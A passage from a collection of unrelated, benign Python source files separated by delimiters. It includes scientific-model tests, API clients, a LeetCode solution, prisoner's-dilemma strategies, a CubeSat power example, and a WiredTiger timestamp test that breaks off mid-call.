left_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6).reshape(3, -1), compute_bounding_box=False))
right_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6, 12).reshape(3, -1), compute_bounding_box=False))
self.assertEqual(node.left, left_tris)
self.assertEqual(node.right, right_tris)
def test_trace(self):
# TODO: figure out how to implement this
pass
|
#!/usr/bin/python3
from subprocess import call;
from sys import argv
from os import path
outPath = argv[1] if(len(argv)>1) else "/etc/dipicar/creds"
duration = 365
rsaLength = 4096
#Generate ssl keys
call([
"openssl",
"req",
"-x509",
"-newkey",
"rsa:"+str(rsaLength),
"-keyout", path.join(outPath,"key.pem"),
"-out", path.join(outPath,"cert.pem"),
"-days", str(duration),
"--batch",
"-nodes"
])
|
import requests
import os
ROOT_URL = 'http://datamall2.mytransport.sg/ltaodataservice'
def get_taxi_availability_request():
result = None
try:
url = '{}/Taxi-Availability'.format(ROOT_URL)
headers = {
'AccountKey': os.getenv('ACCOUNT_KEY'),
'Accept': 'application/json'
}
response = requests.get(url, headers=headers)
print('response status = ', response.status_code)
print('response json = ', response.json())
if response.status_code == 200:
result = response.json()
except Exception as e:
print('error = ', e)
return result
|
# The MIT License (MIT)
# Copyright (c) 2018 by EUMETSAT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from ._mappings import MAPPINGS, API_URL_PREFIX
|
import re
from collections import defaultdict
from datetime import datetime
from elasticsearch_dsl import Keyword, Text
from protean import BaseAggregate, BaseValueObject
from protean.core.model import BaseModel
from protean.fields import DateTime, Integer, String
from protean.fields import Text as ProteanText
from protean.fields import ValueObject
class Person(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
created_at = DateTime(default=datetime.now())
class Alien(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class User(BaseAggregate):
email = String(max_length=255, required=True, unique=True)
password = String(max_length=3026)
class Email(BaseValueObject):
REGEXP = r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?"
# This is the external facing data attribute
address = String(max_length=254, required=True)
def clean(self):
"""Business rules of Email address"""
errors = defaultdict(list)
if not bool(re.match(Email.REGEXP, self.address)):
errors["address"].append("is invalid")
return errors
class ComplexUser(BaseAggregate):
email = ValueObject(Email, required=True)
password = String(required=True, max_length=255)
class Provider(BaseAggregate):
name = ProteanText()
about = ProteanText()
class ProviderCustomModel(BaseModel):
id = Keyword()
name = Text(fields={"raw": Keyword()})
about = Text()
class Meta:
schema = "providers"
class Receiver(BaseAggregate):
name = String()
age = Integer()
|
# https://leetcode.com/problems/design-twitter/
#
# algorithms
# Medium (27.98%)
# Total Accepted: 37,655
# Total Submissions: 134,594
from collections import defaultdict
from bisect import insort
class Twitter(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.follow_map = defaultdict(set) # 关注列表
self.followed_map = defaultdict(set) # 被关注列表
self.tweet_map = defaultdict(list) # 用户关注的列表
self.post_map = defaultdict(list) # 发布列表
self.tweet_stamp = 0
def postTweet(self, userId, tweetId):
"""
Compose a new tweet.
:type userId: int
:type tweetId: int
:rtype: None
"""
self.post_map[userId].append((self.tweet_stamp, tweetId))
for id in self.followed_map[userId]:
insort(self.tweet_map[id], (self.tweet_stamp, tweetId))
insort(self.tweet_map[userId], (self.tweet_stamp, tweetId))
self.tweet_stamp += 1
def getNewsFeed(self, userId):
"""
Retrieve the 10 most recent tweet ids in the user's news feed. Each item in the news feed must be posted by users who the user followed or by the user herself. Tweets must be ordered from most recent to least recent.
:type userId: int
:rtype: List[int]
"""
length = len(self.tweet_map[userId])
if length <= 10:
arr = self.tweet_map[userId]
else:
arr = self.tweet_map[userId][length - 10:]
return [item[-1] for item in reversed(arr)]
def follow(self, followerId, followeeId):
"""
Follower follows a followee. If the operation is invalid, it should be a no-op.
:type followerId: int
:type followeeId: int
:rtype: None
"""
if followerId == followeeId:
return
if followeeId in self.follow_map[followerId]:
return
self.follow_map[followerId].add(followeeId)
self.followed_map[followeeId].add(followerId)
for stamp, tweetId in self.post_map[followeeId]:
insort(self.tweet_map[followerId], (stamp, tweetId))
def unfollow(self, followerId, followeeId):
"""
Follower unfollows a followee. If the operation is invalid, it should be a no-op.
:type followerId: int
:type followeeId: int
:rtype: None
"""
if followerId == followeeId:
return
if followeeId not in self.follow_map[followerId]:
return
self.follow_map[followerId].remove(followeeId)
self.followed_map[followeeId].remove(followerId)
tweet_map = set()
for stamp, _ in self.post_map[followeeId]:
tweet_map.add(stamp)
tmp = []
for stamp, tweetId in self.tweet_map[followerId]:
if stamp not in tweet_map:
tmp.append((stamp, tweetId))
self.tweet_map[followerId] = tmp
# Your Twitter object will be instantiated and called as such:
# obj = Twitter()
# obj.postTweet(userId,tweetId)
# param_2 = obj.getNewsFeed(userId)
# obj.follow(followerId,followeeId)
# obj.unfollow(followerId,followeeId)
|
from const import result
import random
C, D = True, False
def opponent(r):
if r == result.COOP or r == result.DEFECT:
return True
return False
# tit for tat
class Tft:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
# tit for two tat
class Tftt:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
self.last_last_reaction = C
def run(self):
return self.last_reaction | self.last_last_reaction
def next(self, r):
self.score += r.value
self.last_last_reaction = self.last_reaction
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
self.last_last_reaction = C
return self.score
# always coop
class AlwaysCoop:
def __init__(self) -> None:
self.score = 0
def run(self):
return C
def next(self, r):
self.score += r.value
def end(self):
return self.score
# always defect
class AlwaysDefect:
def __init__(self) -> None:
self.score = 0
def run(self):
return D
def next(self, r):
self.score += r.value
def end(self):
return self.score
# perfect random(50%)
class Random:
def __init__(self) -> None:
self.score = 0
def run(self):
return random.choice([C, D])
def next(self, r):
self.score += r.value
def end(self):
return self.score
# first defect, opponent coop rate - coop(>50%) / defect(<=50%)
class Downing:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return D
if self.coop_count / self.game_count > 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
# first coop, opponent coop rate - coop(>=50%) / defect(<50%)
class Downing2:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return C
if self.coop_count / self.game_count >= 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
# coop, always defect once defected
class Grudger:
def __init__(self) -> None:
self.score = 0
self.defected = False
def run(self):
if self.defected:
return D
return C
def next(self, r):
self.score += r.value
if not opponent(r):
self.defected = True
def end(self):
return self.score
# tft but defect by 10% rate
class Joss:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
if random.randint(1, 10) == 1:
return D
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
# wip
class Tester:
def __init__(self) -> None:
self.score = 0
self.decision = True
self.test_tft = False
self.game_count = 0
def run(self):
if self.game_count == 0:
return D
return self.decision
def next(self, r):
self.score += r.value
if self.game_count == 1 & (not opponent(r)):
self.test_tft = True
elif self.test_tft:
self.decision = opponent(r)
elif self.game_count <= 2:
self.decision = True
else:
self.decision = not self.decision
self.game_count += 1
def end(self):
self.decision = True
self.test_tft = False
self.game_count = 0
return self.score
|
import os
import pytest
import sys
import numpy as np
import shutil
import subprocess
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
import targets
mf6_exe = os.path.abspath(targets.target_dict["mf6"])
testname = "uzf_3lay_srfdchk"
testdir = os.path.join("temp", testname)
os.makedirs(testdir, exist_ok=True)
everything_was_successful = True
iuz_cell_dict = {}
cell_iuz_dict = {}
def build_model():
nlay, nrow, ncol = 3, 1, 10
nper = 1
perlen = [20.0]
nstp = [10]
tsmult = len(perlen) * [1.0]
delr = 1.0
delc = 1.0
strt = -25
botm = [
[-5.0, -4.0, -3.0, -3.0, -2.0, -5.0, -4.0, -3.0, -3.0, -2.0],
[-20, -20, -20, -20, -20, -20, -20, -20, -20, -20],
[-30, -30, -30, -30, -30, -30, -30, -30, -30, -30],
]
nouter, ninner = 100, 300
hclose, rclose, relax = 1e-9, 1e-3, 0.97
tdis_rc = []
for i in range(nper):
tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
name = testname
# build MODFLOW 6 files
ws = testdir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name=mf6_exe, sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(
sim, modelname=name, newtonoptions="NEWTON", save_flows=True
)
# create iterative model solution and register the gwf model with it
ims = flopy.mf6.ModflowIms(
sim,
print_option="SUMMARY",
complexity="MODERATE",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="DBD",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="BICGSTAB",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
)
sim.register_ims_package(ims, [gwf.name])
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=0.0,
botm=botm,
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=True, icelltype=1, k=100.0, k33=10
)
# aquifer storage
sto = flopy.mf6.ModflowGwfsto(
gwf, iconvert=1, ss=1e-5, sy=0.2, transient=True
)
# chd files
chdval = -3.0
chdspd = {0: [[(2, 0, 0), chdval]]}
chd = flopy.mf6.ModflowGwfchd(
gwf, print_flows=True, stress_period_data=chdspd
)
# transient uzf info
# iuzno cellid landflg ivertcn surfdp vks thtr thts thti eps [bndnm]
uzf_pkdat = [
[0, (0, 0, 1), 1, 8, 6, 1, 0.05, 0.35, 0.05, 4, "uzf01"],
[1, (0, 0, 2), 1, 9, 6, 1, 0.05, 0.35, 0.05, 4, "uzf02"],
[2, (0, 0, 3), 1, 10, 6, 1, 0.05, 0.35, 0.05, 4, "uzf03"],
[3, (0, 0, 4), 1, 11, 6, 1, 0.05, 0.35, 0.05, 4, "uzf04"],
[4, (0, 0, 5), 1, 12, 6, 1, 0.05, 0.35, 0.05, 4, "uzf05"],
[5, (0, 0, 6), 1, 13, 6, 1, 0.05, 0.35, 0.05, 4, "uzf06"],
[6, (0, 0, 7), 1, 14, 6, 1, 0.05, 0.35, 0.05, 4, "uzf07"],
[7, (0, 0, 8), 1, 15, 6, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[8, (1, 0, 1), 0, 16, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[9, (1, 0, 2), 0, 17, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf10"],
[10, (1, 0, 3), 0, 18, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf11"],
[11, (1, 0, 4), 0, 19, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf12"],
[12, (1, 0, 5), 0, 20, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf13"],
[13, (1, 0, 6), 0, 21, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf14"],
[14, (1, 0, 7), 0, 22, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf15"],
[15, (1, 0, 8), 0, 23, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf16"],
[16, (2, 0, 1), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf17"],
[17, (2, 0, 2), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf18"],
[18, (2, 0, 3), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf19"],
[19, (2, 0, 4), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf20"],
[20, (2, 0, 5), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf21"],
[21, (2, 0, 6), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf22"],
[22, (2, 0, 7), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf23"],
[23, (2, 0, 8), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf24"],
]
for itm in uzf_pkdat:
iuz_cell_dict.update({itm[0]: (itm[1][0], itm[1][1], itm[1][2])})
cell_iuz_dict.update({(itm[1][0], itm[1][1], itm[1][2]): itm[0]})
extdp = 15.0
pet = 0.001
zero = 0.0
uzf_spd = {
0: [
[0, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[1, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[2, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[3, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[4, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[5, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[6, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[7, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[8, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[9, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[10, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[11, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[12, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[13, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[14, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[15, zero, pet, extdp, 7.0e-02, zero, zero, zero],
]
}
uzf = flopy.mf6.ModflowGwfuzf(
gwf,
print_flows=True,
save_flows=True,
simulate_et=True,
simulate_gwseep=True,
linear_gwet=True,
boundnames=True,
ntrailwaves=15,
nwavesets=40,
nuzfcells=len(uzf_pkdat),
packagedata=uzf_pkdat,
perioddata=uzf_spd,
budget_filerecord="{}.uzf.bud".format(name),
filename="{}.uzf".format(name),
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
filename="{}.oc".format(name),
)
return sim
# - No need to change any code below
def test_mf6model():
# build and run the test model
sim = build_model()
sim.write_simulation()
sim.run_simulation()
# ensure that the error msg is contained in the mfsim.lst file
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
def main():
# build and run the test model
sim = build_model()
sim.write_simulation()
sim.run_simulation()
# ensure that the error msg is contained in the mfsim.lst file
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
|
import numpy as np
# Read scec input file
fid = open("tpv29_tpv30_geometry_25m_data.txt")
line = fid.readline()
line = fid.readline()
header = [float(a) for a in line.split()]
nx, ny, lx, ly = header
roughness = np.loadtxt(fid)
roughness = roughness[:, 4]
fid.close()
# create x and y vectors
x = np.linspace(-lx / 2, lx / 2, int(nx) + 1)
y = np.linspace(0, ly, int(ny) + 1)
# write mytopo_tpv29
fout = open("mytopo_tpv29", "w")
fout.write("%d %d\n" % (nx + 1, ny + 1))
np.savetxt(fout, x, fmt="%f")
np.savetxt(fout, y, fmt="%f")
np.savetxt(fout, roughness, fmt="%f")
fout.close()
|
import pytest
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
@pytest.fixture
def inmemory_ebnt():
ebnt = Ebonite.inmemory()
yield ebnt
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(inmemory_ebnt, 'inmemory')
|
"""
example1.py
"A simple example how to use the CubeSat-Power-Estimation tool."
@author: Johan Monster (https://github.com/Hans-Bananendans/)
"""
# Import packages
import numpy as np
import pandas as pd
from mission import Mission
# Defining the config
config = {
"years_passed" : 0, # How many [years] the satellite has been in space for
"battery_capacity" : 81000, # Battery capacity in [W.s] (or: Joule)
"battery_degradation_factor" : 0.04,
"battery_init" : 0.5, # 0.5 = Battery begins at 50% charge
"panel_degradation_factor" : 0.02,
"blip_period" : 30, # Currently unused, telemetry blip period
"blip_duration" : 1, # Currently unused, telemetry blip duration
"no_blips" : ["downlink"], # Currently unused
"orbital_altitude" : 550 # Orbital altitude in [km]
}
# List of the names of all used EPS channels.
channels = ["None", "5V_1", "5V_2", "5V_3", "5V_4", "3.3V_1", \
"3.3V_2", "3.3V_3", "3.3V_4", "Var_rail"]
# Dict of typical voltage supplied to each channel.
channel_voltages = {
"5V_1" : 5,
"5V_2" : 5,
"5V_3" : 5,
"5V_4" : 5,
"3.3V_1" : 3.3,
"3.3V_2" : 3.3,
"3.3V_3" : 3.3,
"3.3V_4" : 3.3,
"Var_rail" : 6.5 # Can between 6.5-8 VDC, highest current is at 6.5V
}
# Dict specifiying which device is on which EPS channel
device_channels = {
"adcs" : "5V_4",
"payload_dice" : "5V_3",
"payload_bitflip" : "3.3V_3",
"antenna" : "3.3V_4",
"obc" : "5V_2",
"obc_board" : "5V_2",
"rx" : "Var_rail",
"tx" : "Var_rail",
"eps" : "None",
"sensors_1" : "3.3V_2",
"sensors_2" : "3.3V_4",
}
# List of all possible OpStates the satellite can be in.
# This list must be consistent with the specified power.xlsx
state_list = ["idle","recharge","dice_payload","wheel_unloading", \
"transponder","downlink","safe_mode","recovery_mode", \
"detumbling_mode"]
# Dict of which colour will be used for each OpState whilst plotting
state_colours = {
"idle" : "#ffffff",
"recharge" : "#2ca02c",
"dice_payload" : "#8000ff",
"wheel_unloading" : "#0080ff",
"transponder" : "#ff8000",
"downlink" : "#ff0000",
"safe_mode" : "#4000ff",
"recovery_mode" : "#777777",
"detumbling_mode" : "#ff00ff"
}
# Baby's first satellite schedule
schedule1 = {
0 : "idle",
50 : "downlink",
100 : "recharge"
}
# Loading the power frame, or the device/OpState table
power_frame = pd.read_excel('power.xlsx',index_col=0)
# Loading the two power input vectors, generated by CubeSat-Solar-Estimator
p_sun = np.load("P_sun.npy")
p_alb = np.load("P_alb.npy")
# Assembling the mission object
m1 = Mission(config, device_channels, state_list, channels, \
power_frame, p_sun, p_alb)
# Calling the Mission.propagate() method to start the simulation
results = m1.propagate(schedule1, tsim=200, dt=1)
# Plotting
m1.plot_timeline_power(state_colours)
|
from __future__ import annotations
from coredis.response.callbacks import (
DictCallback,
ResponseCallback,
SimpleStringCallback,
)
from coredis.response.utils import flat_pairs_to_dict
from coredis.typing import Any, AnyStr, Mapping, Tuple, Union
class ACLLogCallback(ResponseCallback):
def transform(
self, response: Any, **options: Any
) -> Union[bool, Tuple[Mapping[AnyStr, AnyStr], ...]]:
if options.get("reset"):
return SimpleStringCallback()(response)
else:
return tuple(
DictCallback(transform_function=flat_pairs_to_dict)(r) for r in response
)
|
#!/usr/bin/env python
#
# Public Domain 2014-2017 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# test_timestamp04.py
# Timestamps: Test that rollback_to_stable obeys expected visibility rules
#
from suite_subprocess import suite_subprocess
import wiredtiger, wttest
from wtscenario import make_scenarios
def timestamp_str(t):
return '%x' % t
class test_timestamp04(wttest.WiredTigerTestCase, suite_subprocess):
table_ts_log = 'table:ts04_ts_logged'
table_ts_nolog = 'table:ts04_ts_nologged'
table_nots_log = 'table:ts04_nots_logged'
table_nots_nolog = 'table:ts04_nots_nologged'
conncfg = [
('nolog', dict(conn_config='', using_log=False)),
('V1', dict(conn_config=',log=(enabled),compatibility=(release="2.9")', using_log=True)),
('V2', dict(conn_config=',log=(enabled)', using_log=True)),
]
# Minimum cache_size requirement of lsm is 31MB
types = [
('col_fix', dict(empty=1, cacheSize='cache_size=20MB', extra_config=',key_format=r,value_format=8t')),
('col_var', dict(empty=0, cacheSize='cache_size=20MB', extra_config=',key_format=r')),
('lsm', dict(empty=0, cacheSize='cache_size=31MB', extra_config=',type=lsm')),
('row', dict(empty=0, cacheSize='cache_size=20MB', extra_config='',)),
('row-smallcache', dict(empty=0, cacheSize='cache_size=2MB', extra_config='',)),
]
scenarios = make_scenarios(conncfg, types)
# Check that a cursor (optionally started in a new transaction), sees the
# expected values.
def check(self, session, txn_config, tablename, expected, missing=False, prn=False):
if txn_config:
session.begin_transaction(txn_config)
cur = session.open_cursor(tablename, None)
if missing == False:
actual = dict((k, v) for k, v in cur if v != 0)
if prn == True:
print "CHECK : Expected"
print expected
print "CHECK : Actual"
print actual
self.assertTrue(actual == expected)
# Search for the expected items as well as iterating
for k, v in expected.iteritems():
if missing == False:
self.assertEqual(cur[k], v, "for key " + str(k))
else:
cur.set_key(k)
if self.empty:
# Fixed-length column-store rows always exist.
self.assertEqual(cur.search(), 0)
else:
self.assertEqual(cur.search(), wiredtiger.WT_NOTFOUND)
cur.close()
if txn_config:
session.commit_transaction()
# This test varies the cache size and so needs to set up its own connection.
# Override the standard methods.
def setUpConnectionOpen(self, dir):
return None
def setUpSessionOpen(self, conn):
return None
def ConnectionOpen(self, cacheSize):
self.home = '.'
conn_params = 'create,' + \
cacheSize + ',error_prefix="%s" %s' % (self.shortid(), self.conn_config)
try:
self.conn = wiredtiger.wiredtiger_open(self.home, conn_params)
except wiredtiger.WiredTigerError as e:
print "Failed conn at '%s' with config '%s'" % (dir, conn_params)
self.session = self.conn.open_session(None)
def test_rollback_to_stable(self):
if not wiredtiger.timestamp_build():
self.skipTest('requires a timestamp build')
self.ConnectionOpen(self.cacheSize)
# Configure small page sizes to ensure eviction comes through and we
# have a somewhat complex tree
config_default = 'key_format=i,value_format=i,memory_page_max=32k,leaf_page_max=8k,internal_page_max=8k'
config_nolog = ',log=(enabled=false)'
#
# Open four tables:
# 1. Table is logged and uses timestamps.
# 2. Table is not logged and uses timestamps.
# 3. Table is logged and does not use timestamps.
# 4. Table is not logged and does not use timestamps.
#
self.session.create(self.table_ts_log, config_default + self.extra_config)
cur_ts_log = self.session.open_cursor(self.table_ts_log)
self.session.create(self.table_ts_nolog, config_default + config_nolog + self.extra_config)
cur_ts_nolog = self.session.open_cursor(self.table_ts_nolog)
self.session.create(self.table_nots_log, config_default + self.extra_config)
cur_nots_log = self.session.open_cursor(self.table_nots_log)
self.session.create(self.table_nots_nolog, config_default + config_nolog + self.extra_config)
cur_nots_nolog = self.session.open_cursor(self.table_nots_nolog)
# Insert keys each with timestamp=key, in some order
key_range = 10000
keys = range(1, key_range + 1)
# Set keys 1-key_range to value 1.
for k in keys:
cur_nots_log[k] = 1
cur_nots_nolog[k] = 1
self.session.begin_transaction()
cur_ts_log[k] = 1
cur_ts_nolog[k] = 1
self.session.commit_transaction('commit_timestamp=' + timestamp_str(k))
# Setup an oldest timestamp to ensure state remains in cache.
if k == 1:
self.conn.set_timestamp('oldest_timestamp=' + timestamp_str(1))
# Scenario: 1
# Check that we see all the inserted values(i.e 1) in all tables
latest_ts = timestamp_str(key_range)
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[:]))
# Scenario: 2
# Roll back half timestamps.
stable_ts = timestamp_str(key_range / 2)
self.conn.set_timestamp('stable_timestamp=' + stable_ts)
self.conn.rollback_to_stable()
# Check that we see the inserted value (i.e. 1) for all the keys in
# non-timestamp tables
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 1) for k in keys[:]))
# For non-logged tables the behavior is consistent across connections
# with or without log enabled
# Check that we see the inserted value (i.e. 1) for the keys in a
# timestamp table till the stable_timestamp only.
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[(key_range / 2 + 1):]), missing=True)
# For logged tables behavior changes for rollback_to_stable based on
# whether connection level logging is enabled or not.
if self.using_log == True:
# When log is enabled, none of the keys will be rolled back.
# Check that we see all the keys
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[:]))
else:
# When log is disabled, keys will be rolled back till stable_timestamp
# Check that we see the insertions are rolled back in timestamp tables
# till the stable_timestamp
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[(key_range / 2 + 1):]), missing=True)
# Bump the oldest timestamp, we're not going back...
self.conn.set_timestamp('oldest_timestamp=' + stable_ts)
# Update the values again in preparation for rolling back more
for k in keys:
cur_nots_log[k] = 2
cur_nots_nolog[k] = 2
self.session.begin_transaction()
cur_ts_log[k] = 2
cur_ts_nolog[k] = 2
self.session.commit_transaction('commit_timestamp=' + timestamp_str(k + key_range))
# Scenario: 3
# Check that we see all values updated (i.e 2) in all tables
latest_ts = timestamp_str(2 * key_range)
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 2) for k in keys[:]))
# Scenario: 4
# Advance the stable_timestamp by a quarter range and rollback.
# three-quarter timestamps will be rolled back.
stable_ts = timestamp_str(key_range + key_range / 4)
self.conn.set_timestamp('stable_timestamp=' + stable_ts)
self.conn.rollback_to_stable()
# Check that we see the updated value (i.e. 2) for all the keys in
# non-timestamp tables
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 2) for k in keys[:]))
# For non-logged tables the behavior is consistent across connections
# with or without log enabled
# Check that we see only half key ranges in timestamp tables. we see
# the updated value (i.e. 2) for the first quarter keys and old values
# (i.e. 1) for the second quarter keys.
self.check(self.session, 'read_timestamp=' + latest_ts,
